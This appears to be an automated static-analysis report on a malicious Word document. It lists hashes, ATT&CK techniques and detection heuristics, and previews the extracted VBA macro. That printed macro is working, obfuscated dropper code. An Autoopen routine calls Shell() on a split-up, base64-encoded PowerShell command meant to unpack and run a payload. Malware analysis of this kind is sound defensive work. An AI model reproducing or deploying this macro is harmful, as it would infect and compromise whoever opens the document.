Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2094db722ec4fc39…

MALICIOUS

Office (OLE)

82.0 KB Created: 2018-06-07 12:31:00 Authoring application: Microsoft Office Word First seen: 2019-05-10
MD5: 4f7f540a2e67c5198039b15a93ee6b10 SHA-1: 1e79edaf0025e3b6736ee086bca07cd2fb4fb8d2 SHA-256: 2094db722ec4fc390788b50f1f913ceab5402a57b0c974f243054f8ec5440e3e
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The Autoopen macro and a Shell() call within the VBA code indicate that the macro is designed to execute arbitrary commands. The script attempts to construct a command string, likely for downloading and executing a secondary payload, which is a common dropper behavior.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6576135-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6576135-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11150 bytes
SHA-256: c9e2914a08625673da5590f498a8c9aa3d42286b3126c2b24a1d875db1a5a391
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "JEJiMOkwlw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function UAEGdc()
On Error Resume Next
PLLUh = Tan(BSHiP _
* Tan(jNOWM * Int(WEYKw * Sqr(38056) / FpoQB + Fix(47641)) / 52620 * Round(24630 / Log(25352 - wbWTn) + 11868 - STCWi)) _
/ 15883 + Log(5196))
KnnYz = Tan(Prwci _
* Tan(CFJnq * Int(vSvpo * Sqr(67651) / AscRBa + Fix(64249)) / 72790 * Round(18392 / Log(82801 - noPNhk) + 51543 - EtUMKO)) _
/ 60690 + Log(22095))
UAEGdc = sAtLr + Shell(IHGNNUuBBX + Chr(DfYKiz + vbKeyP + VRHzfZm) + aQIksruGT + mtskklTjMNB + CCSrA + VajmBnbEKjn + iBIpsE, 55596 - 55596)
kLUzE = Tan(wNmZu _
* Tan(BbsOX * Int(CDilKP * Sqr(93771) / FjjSDW + Fix(28579)) / 39361 * Round(2979 / Log(96300 - mjPTA) + 89481 - jpCSb)) _
/ 94558 + Log(73872))
End Function
Sub Autoopen()
On Error Resume Next
dIizA = Tan(CZTQj _
* Tan(WYnhZ * Int(slQmji * Sqr(82006) / iHcnEj + Fix(61194)) / 77994 * Round(85644 / Log(12803 - CzQkKv) + 6933 - aoHBV)) _
/ 85897 + Log(63424))
UAEGdc
AwqYw = Tan(BWuzj _
* Tan(zohjj * Int(XzcBGr * Sqr(61492) / QLbFG + Fix(89604)) / 44842 * Round(59231 / Log(59639 - Bistwt) + 79220 - OrVlG)) _
/ 52929 + Log(40948))
End Sub



Attribute VB_Name = "Vjbzszshrpv"
Function aQIksruGT()
On Error Resume Next
tWsDR = Tan(VXBow _
* Tan(NWChE * Int(drKwj * Sqr(52804) / TrEwz + Fix(12592)) / 68338 * Round(48023 / Log(19723 - tFdFO) + 19736 - YHjJE)) _
/ 876 + Log(37312))
hjKYw = "owers" + "HeLL " + "-e KAAgA" + "E4ARQB3" + "AC0ATwB"
VVsjz = Tan(qRlwSQ _
* Tan(ChMAD * Int(IbawP * Sqr(63969) / YZrIOq + Fix(71025)) / 96420 * Round(58661 / Log(71929 - pMRDos) + 14182 - toWZWJ)) _
/ 1439 + Log(84828))
mwZiTEvvnT = "iAGoAZQB" + "DAFQAIABpA" + "E8ALgBzAHQ" + "AUgB" + "lAEEAbQBSAE" + "UAQ" + "QBEAGUAUgAoACA" + "AKAAgAE4ARQB3" + "AC0" + "AT"
ZuWcC = Tan(YQZcj _
* Tan(faXwVL * Int(qFmhrT * Sqr(76610) / BzUzN + Fix(97273)) / 50273 * Round(48334 / Log(69369 - OnMsm) + 29438 - XTNNw)) _
/ 56608 + Log(1976))
CUMLD = "wB" + "iAGoAZQBDAFQ" + "AIAAgAGkATwAu" + "AEMATwBNAFAA"
KBFmMf = Tan(OsXRE _
* Tan(VdFBnh * Int(XizSX * Sqr(34155) / AauCW + Fix(38344)) / 3121 * Round(7298 / Log(94444 - mXjFZ) + 38463 - VKnCq)) _
/ 14936 + Log(22598))
pBGihKDKCi = "cgBlA" + "HMAcwBJAG8ATg" + "AuA" + "EQARQBGAEwAQQB" + "UAGUAc" + "wB0AFIARQBhAE0" + "AKABbAFMA" + "WQBzAFQ"
wtafD = Tan(OuLInz _
* Tan(vkbRj * Int(OQzBwK * Sqr(54450) / MiRKSi + Fix(84014)) / 49940 * Round(50535 / Log(52106 - thYcY) + 94717 - WBZaLk)) _
/ 18746 + Log(43291))
oSjGYmwLjB = "ARQBNAC4Aa" + "QB" + "PAC4ATQBFAG0Ab" + "wByAH" + "kAcwB0AHIAZQBhA" + "G0AXQBbAE" + "MATwBuAFYAZ" + "QByAFQAXQ"
vwrcVb = Tan(BQuzVP _
* Tan(VKAtmD * Int(nYEMob * Sqr(45356) / ShAwlw + Fix(52411)) / 66167 * Round(97741 / Log(4824 - rWMiz) + 30562 - YEQLq)) _
/ 44044 + Log(35994))
fPwMuMUzwwS = "A6ADoAZgBSAG8" + "ATQBiAEEA" + "cwBlADYANA" + "BzAHQA" + "UgBpAG4A"
aQIksruGT = hjKYw + mwZiTEvvnT + CUMLD + pBGihKDKCi + oSjGYmwLjB + fPwMuMUzwwS
End Function
Function mtskklTjMNB()
On Error Resume Next
HZnPh = Tan(SPzMz _
* Tan(djubB * Int(ULUauF * Sqr(94372) / CTWGqd + Fix(56394)) / 60854 * Round(78280 / Log(2684 - jVSZGO) + 33637 - qisKo)) _
/ 19793 + Log(98052))
MjJzzQjfnLq = "ZwAoAC" + "AAJwBYAFoAQgB" + "kA" + "FQAOABJAHcAR"
Gmhfi = Tan(Azwtq _
* Tan(Twzrs * Int(RWCmNL * Sqr(55650) / GCKIh + Fix(93656)) / 84208 * Round(52986 / Log(43425 - HVMRUU) + 51648 - Yviuj)) _
/ 1578 + Log(33820))
rrVQLmsFawQ = "gBJAGIALwBTAG" + "kAKw" + "BXAE" + "QAS" + "wBLADA" + "AZwBzAFEAbw" + "BpADQAawBp" + "AG8ATQBhAGgAR" + "QBCAEMA"
sczUY = Tan(CfLzm _
* Tan(LtirZD * Int(WTABiL * Sqr(595) / hUMWJr + Fix(50747)) / 8234 * Round(28979 / Log(53824 - VmThF) + 44394 - kBiQqV)) _
/ 55478 + Log(32768))
RNVGQRHSnw = "TQBNAF" + "QA" + "RgB" + "kAGQAO" + "ABhA" + "EsAVwA3AH" + "QAMABoADIAMQB" + "JA" + "CsATwA4AFcAUQBT"
nrbRJY = Tan(UKzbdw _
* Tan(pPPXiz * Int(muiAa * Sqr(97312) / 
... (truncated)